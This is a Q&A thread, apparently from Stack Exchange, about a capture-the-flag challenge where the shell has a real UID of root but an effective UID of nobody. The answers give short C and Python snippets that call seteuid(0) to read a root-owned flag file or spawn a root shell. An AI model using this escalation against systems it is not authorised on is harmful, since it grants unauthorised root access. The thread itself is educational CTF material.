2

I'm participating in a capture-the-flag contest where I must implement some form of privilege escalation to read the flag.txt file. I've noticed that when I run whoami I get the following result:

myHostHere:/$ whoami
nobody

But when I run id my UID is set to root:

myHostHere:/$ id
uid=0(root) gid=65534(nobody) euid=65534(nobody)

Does this mean it's possible for me to act as a root user, etc or am I misinterpreting the output?

Edit:

The output of ls -l flag.txt is as follows:

-r--r-----    1 root     root            34 Feb 10 12:00 flag.txt
  • This can be helpful: https://unix.stackexchange.com/a/191955/53467 – gronostaj Mar 17 '20 at 07:17
  • @gronostaj so am I correct in saying that my current shell process (sh) was created by 'root' but all actions executed withing this shell have the privileges of 'nobody'? –  Mar 17 '20 at 07:31
  • I'm not sure. Try `ls -l $(which whoami)`, maybe it has setuid bit enabled. Or maybe your shell does. – gronostaj Mar 17 '20 at 07:33
  • Neither ```sh``` nor ```whoami``` have the setuid bit enabled (I also did a ```find / -perm /2000``` previously which returned nothing). –  Mar 17 '20 at 07:41
  • Please [edit] the question and post the output of `ls -l flag.txt`. – Kamil Maciorowski Mar 17 '20 at 10:12

2 Answers2

1

This can be solved by writing and compiling (with --static) a C program like so on a separate machine:

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
void main() {
    seteuid(0);
    setgid(0);
    system("cat flag.txt");
}

This file can be copied over to the CTF machine, given permission to execute with chmod +x, and run from the tmp folder.

0

I created a setup very similar to yours. I did it with a debugger (examples: here and there). In the affected shell I have:

$ whoami
nobody
$ id
uid=0(root) gid=65534(nogroup) euid=65534(nobody) groups=65534(nogroup)
$

Then, according to this answer:

File access, and operations that require root privileges, look at the effective UID and GID.

Indeed, this is what happens:

$ ls -l flag.txt
---------- 1 root root 4 Mar 17 08:57 flag.txt
$ cat flag.txt
cat: flag.txt: Permission denied
$

But I can do this:

$ sudo cat flag.txt
foo

Or this:

$ su -
# whoami
root
# cat flag.txt
foo

Or this:

$ sg root 'cat flag.txt'
foo

When you have uid=0, anything that can use seteuid system call and then read the file can help you. E.g. python:

import os
os.seteuid(0)
f = open('flag.txt', 'r')
print f.read()
f.close()

Instead of (or aside of) reading the file you can spawn an elevated shell:

import os
os.seteuid(0)
os.execve("/bin/sh", [], {})

In this shell you're root; cat flag.txt will work.

Testbed: Debian GNU/Linux 9.

Kamil Maciorowski
  • 69,815
  • 22
  • 136
  • 202
  • Unfortunately the system in question does not have ```sudo```, ```gdb```, etc. installed (and installation requires root permissions) and any attempted usage of ```su``` throws the following error: ```su: can't set groups: Operation not permitted```. –  Mar 17 '20 at 09:51
  • @JamesDiamond Is there anything that can call `seteuid`? Compare the Python example in the now expanded answer. – Kamil Maciorowski Mar 17 '20 at 10:31